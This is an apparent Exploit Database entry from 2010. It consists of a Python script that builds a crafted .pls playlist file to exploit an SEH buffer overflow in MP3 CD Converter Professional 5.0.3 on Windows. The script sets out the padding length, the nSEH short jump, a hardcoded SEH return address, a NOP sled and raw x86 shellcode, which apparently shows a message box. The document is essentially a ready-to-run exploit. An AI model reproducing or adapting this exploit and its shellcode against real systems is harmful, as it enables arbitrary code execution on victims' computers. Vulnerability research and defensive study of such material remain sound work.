MP3 CD Converter Professional – Local Buffer Overflow (SEH)

• Exploit Database
• 10 阅读

• 作者： C4SS!0 G0M3S
  日期： 2010-12-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15785/

• #!/usr/bin/python
  #
  #
  #Python File Created BY C4SS!0 G0MES
  #http://www.invasao.com.br
  #Louredo_@hotmail.com
  #
  #
  #[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)
  #[+]Date: 12/20/2010
  #[+]Author: C4SS!0 G0M3S
  #[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
  #[+]Version: 5.0.3
  #[+]Tested On: WIN-XP SP3 Virtual Box
  #[+]CVE: N/A
  #
  #
  #
  
  
  import os
  import sys
  import struct
  import time
  
  def usage():
  os.system("cls")
  os.system("color 4f")
  print("\n"
  "=====================================================================\n"
  "|| ||\n"
  "||Exploit Buffer Overflow MP3 CD Converter Professional(SEH) ||\n"
  "||Author C4SS!0 G0M3S||\n||"
  " ||\n"
  "=====================================================================\n\n")
  
  print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)")
  print("[+]Date: 12/20/2010")
  print("[+]Author: C4SS!0 G0M3S")
  print("[+]E-mail: Louredo_@hotmail.com")
  print("[+]Home: http://www.invasao.com.br")
  print("[+]Impact: Hich")
  print("[+]Version: 5.0.3")
  print("[+]Country: Brazil\n")
  
  if len(sys.argv) !=2:
  usage()
  print "[-]Usage: "+sys.argv[0]+" <File Name>"
  print "[-]Exemple: "+sys.argv[0]+" Exploit.pls"
  sys.exit(0)
  
  buffer = "\x41" * 780
  nseh = "\xeb\x0d\x90\x90"#JMP SHORT 14
  seh = struct.pack('<L',0x0077cebf)
  nops = "\x90" * 10
  usage()
  print "[*]Identifying the length Shellcode"
  time.sleep(1)
  shellcode = ("\x33\xC0\x33\xC9\x33\xD2\x33\xDB\x50\x68\x6C\x6C\x20\x20\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\x58\xBB\x7B\x1D\x80\x7C\x50"
  "\xFF\xD3\x90\x33\xD2\x52\xB9\x5E\x67\x30\xEF\x81\xC1\x11\x11\x11\x11\x51\x68\x61\x67\x65\x42\x68\x4D\x65\x73\x73\x54\x5A\x52\x50"
  "\xB9\x30\xAE\x80\x7C\xFF\xD1\x33\xC9\x33\xD2\x33\xDB\x51\x68\x53\x20\x20\x20\x68\x47\x30\x4D\x33\x68\x53\x21\x30\x20\x68\x20\x43"
  "\x34\x53\x68\x64\x20\x42\x79\x68\x6F\x69\x74\x65\x68\x45\x78\x70\x6C\x54\x59\x53\x68\x21\x30\x20\x20\x68\x43\x34\x53\x53\x54\x5B"
  "\x6A\x40\x53\x51\x52\xFF\xD0\x33\xC0\x50\xBE\xFA\xCA\x81\x7C\xFF\xD6")
  
  print "[*]The length is Shellcode:"+str(len(shellcode))
  time.sleep(1)
  
  
  
  payload = str(buffer+nseh+seh+nops+shellcode)
  
  print "[*]Creating the Archive "+sys.argv[1]
  time.sleep(1)
  file = sys.argv[1]
  try:
  f=open(file,"w")
  f.write(payload)
  f.close()
  print "[*]The Archive was created "+str(file)+" Success"
  time.sleep(1)
  except:
  print "[-]Error Creating File "+file